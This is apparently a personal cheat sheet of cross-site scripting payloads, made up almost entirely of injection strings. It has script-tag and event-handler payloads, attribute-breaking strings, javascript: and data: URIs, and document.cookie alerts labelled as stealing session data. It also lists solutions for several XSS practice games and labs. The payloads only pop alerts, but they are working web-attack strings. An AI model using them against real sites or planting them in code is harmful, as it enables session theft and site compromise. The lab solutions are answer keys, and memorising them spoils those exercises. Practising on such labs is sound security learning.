# My XSS Payloads    ~ SudoHopeX
-------------------------------------------------------------------------------------

[+] Test if Payload is working
[!] NOTE: after testing check for window.origin or document.domain to check for scope and effected domain or subdomain

+ First step to check for xss
<script>alert(1)</script>
<script>alert`1`</script>

+ When alert(1) is blocked
<script>prompt('XSS')</script>

+ testing silently without alert boxes
<script>console.log('XSS')</script>

+ when <script> tag is not working, then use it within an html element

onclick="alert(1)"

<a href="#" onclick="alert(1)">Click Me!</a>

<a onclick="alert(1)">Click Me!</a>

onerror=alert(1) <- adding an element with false link and generating alert in error

"><img src=x onerror=alert(1)>

<img src="x" onerror="alert('XSS')">
<svg onload="alert('XSS')">

<iframe src="javascript:alert('XSS')"></iframe>

+ See (steal) session data.
<script>alert(document.cookie)</script>

+ generating an error to check
' <- try single-quote(') to check for any error within page or console

------------------------------------------------------------------------------------
[+] Google's XSS game solutions

1. <script>alert(1)</script>                            // context -> within html
2. <a href="" onclick="alert(1)">click Me</a>           // context -> within html
3. 3' onerror='alert(1)'>//                             // context -> within html tags ( img attributes )
4. ')%3Balert(1,'                                       // context -> within javascript
5. javascript:alert(1);                                 // context -> within html tags ( a attributes )
6. data:text/javascript,alert('XSS') or data:text/plain,alert(1)     // context -> within html tags ( script src tag ), loading files dynamically via url
-------------------------------------------------------------------------------------
[+] XSS Labs (at https://xss-labs.abay.sh/xss/ ) solution - # self solved
1. <script>alert(1)</script>                                   // context -> within html
2. " onfocus="alert(document['cookie'])                        // context -> within html tags ( input box placeholder ) [ btw it broke page to continuously load and show popups infinitely ]
3. " onfocus="alert(document['cookie'])                        // context -> within html tags ( input box placeholder )
4. " onfocus="console.log(document['cookie'])
5. 

-------------------------------------------------------------------------------------
[+] Alf.nu XSS Game 
1. "); alert(1,"                                         // context -> javascript
2. </script><script>alert(1)//                           // context -> js
3. </script><script>alert(1)//                           // context -> js
4. 

------------------------------------------------------------------------------------
[+] My Own Event Handler Labs's Solutions ( context: html tags, remember to inject these payloads we first need to break the tags )

<img src=x onerror="alert(window.origin)">
<img src=x onload="alert(window.origin)">
<img src=x onclick="alert(window.origin)">
<img src=x onmouseover="alert(window.origin)">
<img src=x onfocus="alert(window.origin)" tabIndex="0">
<img src=x onblur="alert(window.origin)"> 
<input oninput="alert(window.origin)">
<div ondblclick="alert(1)">Double-click me</div>
<input onkeypress="alert(window.origin)" value="select me">
<input onselect="alert(window.origin)" value="select me">
<button onmouseup="alert(window.origin)">Release me</button>
<button onmousedown="alert(1)">Release me</button>
<input onpaste="alert(1)" value="paste here">   // when something is pasted
<input oncut="alert(1)" value="cut me">  // when content is cut
<input oncopy="alert(1)" value="copy me">
<audio controls onvolumechange=="alert(window.origin)" src="https://sudohopex.github.io/img/ankhon-me-desh-bashaye.mp3"></audio>          # more events: onplay, onpause, onended
<video width="200" controls ontimeupdate="alert(window.origin)">               # more events: onplay, onended, onpause, ontimeupdate, ondurationchange
  <source src="http://commondatastorage.googleapis.com/gtv-videos-bucket/sample/ForBiggerEscapes.mp4" type="video/mp4">
</video>
